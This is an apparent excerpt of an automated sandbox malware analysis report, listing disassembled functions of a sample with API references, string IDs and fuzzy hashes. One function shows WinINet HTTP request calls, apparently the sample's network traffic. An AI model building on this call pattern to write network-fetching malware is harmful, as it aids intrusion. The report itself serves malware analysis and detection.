                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: malloc
                                                                                                                                                                        • String ID: image/jpeg
                                                                                                                                                                        • API String ID: 2803490479-3785015651
                                                                                                                                                                        • Opcode ID: beec969ceb915eb0738850563984e7f0f02e6dc3697ce254adff15b7a7df6115
                                                                                                                                                                        • Instruction ID: d6fcef2b0942905c38ddfcf73f2ee279d0e378fbc482be7165ba50ced5977b74
                                                                                                                                                                        • Opcode Fuzzy Hash: beec969ceb915eb0738850563984e7f0f02e6dc3697ce254adff15b7a7df6115
                                                                                                                                                                        • Instruction Fuzzy Hash: A1116572904109FBCF12AFA5DC8489EBF79FE46364B21026AE911A7190D7719E849650
                                                                                                                                                                        Function 0018F0FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0018F113
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECAA
                                                                                                                                                                          • Part of subcall function 001AEC95: __CxxThrowException@8.LIBCMT ref: 001AECBF
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECD0
                                                                                                                                                                          • Part of subcall function 0018F20D: std::_Xinvalid_argument.LIBCPMT ref: 0018F217
                                                                                                                                                                        • _memmove.LIBCMT ref: 0018F165
                                                                                                                                                                        Strings
                                                                                                                                                                        • invalid string position, xrefs: 0018F10E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                        • String ID: invalid string position
                                                                                                                                                                        • API String ID: 3404309857-1799206989
                                                                                                                                                                        • Opcode ID: 681e28146d4c68ac1800aba1263bb25c90851f0c67b944c22ce3e9adb2d612c2
                                                                                                                                                                        • Instruction ID: f9dcbd964029ec7bbf8a48b7b8c20fdc4c162af82ae9a3bd3b0436e1a9936bb0
                                                                                                                                                                        • Opcode Fuzzy Hash: 681e28146d4c68ac1800aba1263bb25c90851f0c67b944c22ce3e9adb2d612c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C11AD35704204DBCB14BE2CDC8856977A6AF29361B54463DF829CB242C770EA82CFE1
                                                                                                                                                                        Function 0018F322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0018F331
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECAA
                                                                                                                                                                          • Part of subcall function 001AEC95: __CxxThrowException@8.LIBCMT ref: 001AECBF
                                                                                                                                                                          • Part of subcall function 001AEC95: std::exception::exception.LIBCMT ref: 001AECD0
                                                                                                                                                                        • memmove.MSVCRT(0018EE93,0018EE93,C6C68B00,0018EE93,0018EE93,0018F134,?,?,?,0018F1B4,?,?,?,74DF0440,?,-00000001), ref: 0018F367
                                                                                                                                                                        Strings
                                                                                                                                                                        • invalid string position, xrefs: 0018F32C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                        • String ID: invalid string position
                                                                                                                                                                        • API String ID: 1659287814-1799206989
                                                                                                                                                                        • Opcode ID: dcfa0a2484a1274433f320cd88c1876377e8944e57d4863061a12f3efeba76a4
                                                                                                                                                                        • Instruction ID: d51af1046342416205e9e6b45e79089c7f8f7306fa0bba6c997fc320c0354224
                                                                                                                                                                        • Opcode Fuzzy Hash: dcfa0a2484a1274433f320cd88c1876377e8944e57d4863061a12f3efeba76a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D0181713006018BD728AE7898D852EB6E6FBC8711724493CE892C7745DBB4EE4BDB90
                                                                                                                                                                        Function 00196880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00186963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001869C5
                                                                                                                                                                          • Part of subcall function 00186963: StrCmpCA.SHLWAPI(?), ref: 001869DF
                                                                                                                                                                          • Part of subcall function 00186963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186A0E
                                                                                                                                                                          • Part of subcall function 00186963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00186A4D
                                                                                                                                                                          • Part of subcall function 00186963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186A7D
                                                                                                                                                                          • Part of subcall function 00186963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186A88
                                                                                                                                                                          • Part of subcall function 00186963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00186AAC
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 001968B5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                        • String ID: ERROR$ERROR
                                                                                                                                                                        • API String ID: 3086566538-2579291623
                                                                                                                                                                        • Opcode ID: a301efd1c3e4050218f6965065d531a4d4f484e10c8455dd7512e7ed5199b558
                                                                                                                                                                        • Instruction ID: 3dcb6e384155dc8c11630cc306b1390b0353a20102524cfaed647baef55fbbf4
                                                                                                                                                                        • Opcode Fuzzy Hash: a301efd1c3e4050218f6965065d531a4d4f484e10c8455dd7512e7ed5199b558
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D01FB35E002189BCB22BB75EC4699D77A8AF34304B5441A1FD24E3253DB34EE058BE1
                                                                                                                                                                        Function 0019F409 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NameName::
                                                                                                                                                                        • String ID: {flat}
                                                                                                                                                                        • API String ID: 1333004437-2606204563
                                                                                                                                                                        • Opcode ID: 8d82a1d2f0a4b58729c0bba60cfe1d744be8fb30f942274fee52286b1d898ea6
                                                                                                                                                                        • Instruction ID: b7b4bf86060d7c4a2242cdc4e34d691f2e0f99a88a81ca1372e367c857aea795
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d82a1d2f0a4b58729c0bba60cfe1d744be8fb30f942274fee52286b1d898ea6
                                                                                                                                                                        • Instruction Fuzzy Hash: 75F06D71281248AFCF11EF58E855BA63BA5EF45B55F48C089F94C8F296C770D883CB92
                                                                                                                                                                        Function 0018141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: GlobalMemoryStatus_memset
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 587104284-2766056989
                                                                                                                                                                        • Opcode ID: 7cf19ffa1e4966a44813d3c9923df2f07f1a3e1a240e07bcd2579474d1c639d4
                                                                                                                                                                        • Instruction ID: 402a55b8f960442dedb21833cc2e2b49840b0f8585ec4b5fb48c9d258b9f0af7
                                                                                                                                                                        • Opcode Fuzzy Hash: 7cf19ffa1e4966a44813d3c9923df2f07f1a3e1a240e07bcd2579474d1c639d4
                                                                                                                                                                        • Instruction Fuzzy Hash: 3BE0BFF590020CABDB04EFA4E946B5DB7B8AB18744F500025BA06F7281E774BB098655